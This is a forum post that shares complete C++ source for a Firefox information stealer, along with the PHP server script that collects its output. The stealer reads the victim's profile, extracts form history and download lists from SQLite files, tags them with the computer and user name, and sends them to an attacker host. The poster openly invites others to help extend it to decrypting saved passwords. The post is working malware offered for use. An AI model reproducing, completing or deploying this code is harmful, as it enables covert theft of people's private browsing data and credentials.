Cartman. Posted June 26, 2014 Report Posted June 26, 2014 Here is my mozilla firefox stealer, it steals download lists and form history. It can easly be extended and used to stealother datas from a mozilla firefox. I used sqlite and used a sqlite.lib file which i compiled. I used web based communication.I generally used WinApi functions.Datas are sent to a php file and be logged in a server. Please don't forget to give permissionsThanks JeFF for his help about widestring and ansi-string help.Thanks frankl3fr6nk for kind beta testingThanks icarus for his helps to me about learning malware fundamentals We can develop this stealer together with peoples who have knowledge about these. For instance - my first question is how to decrypt to encrypted password- How to do this code more compatible with other operating systems- How to reduce the sizeI attached sqlite3.h and sqlite3.c and sqlite.libconfig.h#define HOST "www.xxx.com" // Do not change its format..#define PORT 80#define PAGE_NAME "stealer.php" // Do not change its format..functions.h#include <Windows.h>#include <WinInet.h>#include "config.h"void Request (const char* server,const char* input);char* getComputerName();getFormHistory.h#include "config.h"#include "sqlite3.h"void getFormHistory(char* path);getDownloads.h#include "config.h"#include "sqlite3.h"void getDownloads(char *path);functions.cpp#include "functions.h"void Request (const char* server,const char* input) { HINTERNET hInternet; HINTERNET hConnect; HINTERNET hRequest; hInternet = InternetOpenA("Open",INTERNET_OPEN_TYPE_PRECONFIG,NULL,NULL,INTERNET_FLAG_DONT_CACHE); if (hInternet != NULL) { hConnect = InternetConnectA(hInternet,server,PORT,NULL,NULL,INTERNET_SERVICE_HTTP,0,1u); if (hConnect != NULL) { hRequest = HttpOpenRequestA(hConnect,"GET",input,NULL,NULL,0,INTERNET_FLAG_KEEP_CONNECTION,1); if (hRequest != NULL) { HttpSendRequestA(hRequest,"Content-Type: application/x-www-form-urlencoded\r\n",-1L,NULL,0); } } } InternetCloseHandle(hInternet); InternetCloseHandle(hConnect); InternetCloseHandle(hRequest);}char* getComputerName(){ DWORD computerNameSize = 512; char* computerName; computerName = (char*)malloc(512*sizeof(char)); GetComputerNameA(computerName, &computerNameSize); DWORD UserNameSize = 512; char* userName; userName = (char*)malloc(512*sizeof(char)); GetUserNameA(userName, &UserNameSize); char* fullComputerName = (char*)malloc(1024*sizeof(char)); ZeroMemory(fullComputerName,1024*sizeof(char)); strcat(fullComputerName,(const char*)computerName); strcat(fullComputerName,userName); return fullComputerName;}getFormHistory.cpp#include "getFormHistory.h"#include "functions.h"void getFormHistory(char* path){ char *zErrMsg = 0; int error; sqlite3_stmt *res; const char *tail; char *formhistory; char* pathCopy; pathCopy = (char*)malloc(256*sizeof(char)); ZeroMemory(pathCopy,256*sizeof(char)); strcpy(pathCopy,path); strcat(pathCopy,"\\formhistory.sqlite"); pathCopy[strlen(pathCopy)-(strlen("Default=1")+4)+strlen("\\fomrhistory.sqlite")+1] = '\00'; sqlite3 *db; // sqlite3 db struct error = sqlite3_open(pathCopy, &db); if(!error) { formhistory = (char*)malloc(429496729); ZeroMemory(formhistory,429496729); sqlite3_prepare_v2(db,"select * from moz_formhistory",1000,&res,&tail); if (error == SQLITE_OK) { while (sqlite3_step(res) == SQLITE_ROW) { if(strlen(formhistory) > 6000) break; strcat(formhistory,(char*)sqlite3_column_text(res, 1)); strcat(formhistory,"--"); strcat(formhistory,(char*)sqlite3_column_text(res, 2)); strcat(formhistory,"*-*-*"); } } } sqlite3_close(db); char* computerName; computerName = (char*)malloc(1024*sizeof(char)); ZeroMemory(computerName,1024*sizeof(char)); computerName = getComputerName(); char *data; data = (char*)malloc(429496729*sizeof(char)); ZeroMemory(data,429496729*sizeof(char)); strcpy(data,PAGE_NAME); strcat(data,"?computerName="); strcat(data,computerName); strcat(data,"-formhistory"); strcat(data,"&formhistory="); strcat(data,formhistory); Request(HOST,data); free(computerName); free(formhistory);}getDownlaods.cpp#include "getDownloads.h"#include "functions.h"void getDownloads(char *path){ char *zErrMsg = 0; int error; sqlite3_stmt *res; const char *tail; char *downloads; char* pathCopy; pathCopy = (char*)malloc(256*sizeof(char)); ZeroMemory(pathCopy,256*sizeof(char)); strcpy(pathCopy,path); strcat(pathCopy,"\\downloads.sqlite"); pathCopy[strlen(pathCopy)-(strlen("Default=1")+4)+strlen("\\downloads.sqlite")+1] = '\00'; sqlite3 *db; // sqlite3 db struct error = sqlite3_open(pathCopy, &db); if(!error) { downloads = (char*)malloc(429496729); ZeroMemory(downloads,429496729); sqlite3_prepare_v2(db,"select * from moz_downloads",1000,&res,&tail); if (error == SQLITE_OK) { while (sqlite3_step(res) == SQLITE_ROW) { strcat(downloads,(char*)sqlite3_column_text(res, 1)); strcat(downloads,"*-*-*"); } } } sqlite3_close(db); char* computerName; computerName = (char*)malloc(1024*sizeof(char)); ZeroMemory(computerName,1024*sizeof(char)); computerName = getComputerName(); char *data; data = (char*)malloc(429496729*sizeof(char)); ZeroMemory(data,429496729*sizeof(char)); strcpy(data,PAGE_NAME); strcat(data,"?computerName="); strcat(data,computerName); strcat(data,"-downloads"); strcat(data,"&downloads="); strcat(data,downloads); Request(HOST,data); free(computerName); free(downloads);}main.cpp#include <windows.h>#include "getFormHistory.h"#include "getDownloads.h"// Thanks to LeFF from opensc.wsint main(){ HANDLE hFile; DWORD dwBytesRead = 0; char ReadBuffer[513] = {0}; char* appDataStr = (char*)malloc(256*sizeof(char)); int strSize = ExpandEnvironmentStringsA("%APPDATA%",appDataStr, 256 ); char* iniFile; iniFile = (char*)malloc(512*sizeof(char*)); ZeroMemory(iniFile,512); strcat((char*)appDataStr,"\\Mozilla\\Firefox\\profiles.ini"); strcat((char*)iniFile,(char*)appDataStr); hFile = CreateFileA(iniFile,GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL); if (hFile != INVALID_HANDLE_VALUE) { ReadFile(hFile, ReadBuffer, 512, &dwBytesRead, NULL); } CloseHandle(hFile); char *pathStart; ReadBuffer[dwBytesRead] = '\00'; pathStart = strstr(ReadBuffer,"Path="); pathStart = pathStart + 5*sizeof(char); int size = strlen(pathStart)-(strlen("Default=1")+4); char *realPath; realPath = (char*)malloc(256*sizeof(char)); ZeroMemory(realPath,256*sizeof(char)); strncat(realPath,pathStart,size-2); // 4 for \t\n and \t\n getDownloads(realPath); // Get downloads getFormHistory(realPath); // Get form history //each function should keep realPath variable same. free(appDataStr); free(iniFile); return 0;}stealer.php<html><body><?php $downloads = $_GET["downloads"]; $computerName = $_GET["computerName"]; $formhistory = $_GET["formhistory"]; $handle = fopen($computerName, 'a'); if(isset($downloads)) { $downloads = str_replace("*-*-*","\t\n", $downloads); fwrite($handle, $downloads); fwrite($handle, "\t\n\t\n"); fwrite($handle, "-----downloads done-----\t\n\t\n"); fclose($handle); } else if(isset($formhistory)) { $formhistory = str_replace("*-*-*","\t\n", $formhistory); fwrite($handle, $formhistory); fwrite($handle, "\t\n\t\n"); fwrite($handle, "-----formhistory done-----\t\n\t\n"); fclose($handle); }?></body></html> 1 Quote